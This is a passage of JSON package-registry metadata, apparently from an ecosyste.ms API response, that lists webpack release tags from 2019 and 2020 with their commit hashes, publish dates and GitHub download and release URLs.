sitories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.